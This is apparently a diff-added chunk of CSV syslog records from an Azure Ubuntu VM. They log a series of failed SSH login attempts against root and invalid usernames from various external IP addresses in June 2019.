+13207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:51,UbuntuDevEnv,2019-06-26 04:34:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,128821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:51,UbuntuDevEnv,2019-06-26 04:34:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:53,UbuntuDevEnv,2019-06-26 04:34:53,auth,UbuntuDevEnv,info,Failed password for invalid user nathan from 177.23.90.10 port 46986 ssh2,128821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,177.23.90.1,46986,,
+13210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:54,UbuntuDevEnv,2019-06-26 04:34:53,auth,UbuntuDevEnv,info,Disconnected from invalid user nathan 177.23.90.10 port 46986 [preauth],128821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,177.23.90.1,46986,,
+13211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:54,UbuntuDevEnv,2019-06-26 04:34:53,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 46986:11: Bye Bye [preauth],128821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,46986,,
+13212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:13,UbuntuDevEnv,2019-06-26 04:35:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72  user=root,128917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,5.135.161.7,,0,
+13213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:15,UbuntuDevEnv,2019-06-26 04:35:15,auth,UbuntuDevEnv,info,Failed password for root from 5.135.161.72 port 58152 ssh2,128917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,58152,,
+13214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:16,UbuntuDevEnv,2019-06-26 04:35:15,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 58152:11: Bye Bye [preauth],128917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,58152,,
+13215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:16,UbuntuDevEnv,2019-06-26 04:35:15,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 5.135.161.72 port 58152 [preauth],128917,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,5.135.161.7,58152,,
+13216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:20,UbuntuDevEnv,2019-06-26 04:35:20,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 54968 [preauth],128910,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,54968,,
+13217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:28,UbuntuDevEnv,2019-06-26 04:35:28,auth,UbuntuDevEnv,info,Invalid user hostmaster from 95.216.195.95 port 53156,128969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hostmaster,95.216.195.9,53156,,
+13218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:28,UbuntuDevEnv,2019-06-26 04:35:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:28,UbuntuDevEnv,2019-06-26 04:35:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,128969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:30,UbuntuDevEnv,2019-06-26 04:35:30,auth,UbuntuDevEnv,info,Failed password for invalid user hostmaster from 95.216.195.95 port 53156 ssh2,128969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hostmaster,95.216.195.9,53156,,
+13221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:30,UbuntuDevEnv,2019-06-26 04:35:30,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 53156:11: Bye Bye [preauth],128969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,53156,,
+13222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:30,UbuntuDevEnv,2019-06-26 04:35:30,auth,UbuntuDevEnv,info,Disconnected from invalid user hostmaster 95.216.195.95 port 53156 [preauth],128969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hostmaster,95.216.195.9,53156,,
+13223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:44,UbuntuDevEnv,2019-06-26 04:35:43,auth,UbuntuDevEnv,info,Invalid user dao from 45.55.190.46 port 57664,128924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dao,45.55.190.4,57664,,
+13224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:44,UbuntuDevEnv,2019-06-26 04:35:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,128924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+13225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:44,UbuntuDevEnv,2019-06-26 04:35:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:46,UbuntuDevEnv,2019-06-26 04:35:46,auth,UbuntuDevEnv,info,Failed password for invalid user dao from 45.55.190.46 port 57664 ssh2,128924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dao,45.55.190.4,57664,,
+13227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:50,UbuntuDevEnv,2019-06-26 04:35:49,auth,UbuntuDevEnv,info,Disconnected from invalid user dao 45.55.190.46 port 57664 [preauth],128924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dao,45.55.190.4,57664,,
+13228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:50,UbuntuDevEnv,2019-06-26 04:35:49,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 57664:11: Bye Bye [preauth],128924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,57664,,
+13229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:50,UbuntuDevEnv,2019-06-26 04:35:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:52,UbuntuDevEnv,2019-06-26 04:35:52,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 32262 ssh2,129045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32262,,
+13231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:59,UbuntuDevEnv,2019-06-26 04:35:58,auth,UbuntuDevEnv,info,Invalid user git from 200.6.188.38 port 47067,129075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,200.6.188.3,47067,,
+13232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:59,UbuntuDevEnv,2019-06-26 04:35:58,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 32262 ssh2],129045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32262,,
+13233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:59,UbuntuDevEnv,2019-06-26 04:35:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,129075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:35:59,UbuntuDevEnv,2019-06-26 04:35:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:01,UbuntuDevEnv,2019-06-26 04:36:00,auth,UbuntuDevEnv,info,Failed password for invalid user git from 200.6.188.38 port 47067 ssh2,129075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,200.6.188.3,47067,,
+13236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:01,UbuntuDevEnv,2019-06-26 04:36:00,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 32262 ssh2,129045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32262,,
+13237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:01,UbuntuDevEnv,2019-06-26 04:36:01,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 47067:11: Bye Bye [preauth],129075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,47067,,
+13238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:01,UbuntuDevEnv,2019-06-26 04:36:01,auth,UbuntuDevEnv,info,Disconnected from invalid user git 200.6.188.38 port 47067 [preauth],129075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,200.6.188.3,47067,,
+13239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:04,UbuntuDevEnv,2019-06-26 04:36:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 32262 ssh2,129045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32262,,
+13240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:07,UbuntuDevEnv,2019-06-26 04:36:06,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:07,UbuntuDevEnv,2019-06-26 04:36:06,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 32262 ssh2 [preauth],129045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32262,,
+13242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:07,UbuntuDevEnv,2019-06-26 04:36:06,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 32262 ssh2,129045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32262,,
+13243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:07,UbuntuDevEnv,2019-06-26 04:36:06,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 32262: Too many authentication failures [preauth],129045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,32262,,
+13244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:07,UbuntuDevEnv,2019-06-26 04:36:06,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:10,UbuntuDevEnv,2019-06-26 04:36:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:12,UbuntuDevEnv,2019-06-26 04:36:11,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44165 ssh2,129129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44165,,
+13247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:21,UbuntuDevEnv,2019-06-26 04:36:19,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 44165 ssh2],129129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44165,,
+13248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:21,UbuntuDevEnv,2019-06-26 04:36:21,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 58477 [preauth],129152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,58477,,
+13249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:22,UbuntuDevEnv,2019-06-26 04:36:22,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44165 ssh2,129129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44165,,
+13250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:25,UbuntuDevEnv,2019-06-26 04:36:25,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44165 ssh2,129129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44165,,
+13251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:25,UbuntuDevEnv,2019-06-26 04:36:25,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 44165: Too many authentication failures [preauth],129129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,44165,,
+13252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:25,UbuntuDevEnv,2019-06-26 04:36:25,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 44165 ssh2 [preauth],129129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44165,,
+13253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:25,UbuntuDevEnv,2019-06-26 04:36:25,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:25,UbuntuDevEnv,2019-06-26 04:36:25,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:28,UbuntuDevEnv,2019-06-26 04:36:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:30,UbuntuDevEnv,2019-06-26 04:36:29,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49892 ssh2,129189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49892,,
+13257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:43,UbuntuDevEnv,2019-06-26 04:36:43,auth,UbuntuDevEnv,info,Invalid user fermat from 5.135.161.72 port 46360,129243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fermat,5.135.161.7,46360,,
+13258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:43,UbuntuDevEnv,2019-06-26 04:36:40,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 49892 ssh2],129189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49892,,
+13259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:43,UbuntuDevEnv,2019-06-26 04:36:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:43,UbuntuDevEnv,2019-06-26 04:36:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,129243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:43,UbuntuDevEnv,2019-06-26 04:36:43,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 49892 ssh2 [preauth],129189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49892,,
+13262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:43,UbuntuDevEnv,2019-06-26 04:36:43,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49892 ssh2,129189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49892,,
+13263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:43,UbuntuDevEnv,2019-06-26 04:36:43,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 49892: Too many authentication failures [preauth],129189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,49892,,
+13264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:43,UbuntuDevEnv,2019-06-26 04:36:43,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:43,UbuntuDevEnv,2019-06-26 04:36:43,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:36:45,UbuntuDevEnv,2019-06-26 04:36:45,auth,UbuntuDevEnv,info,Failed password for invalid user fermat from 5.135.161.72 port 46360 ssh2,129243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fermat,5.135.161.7,46360,,
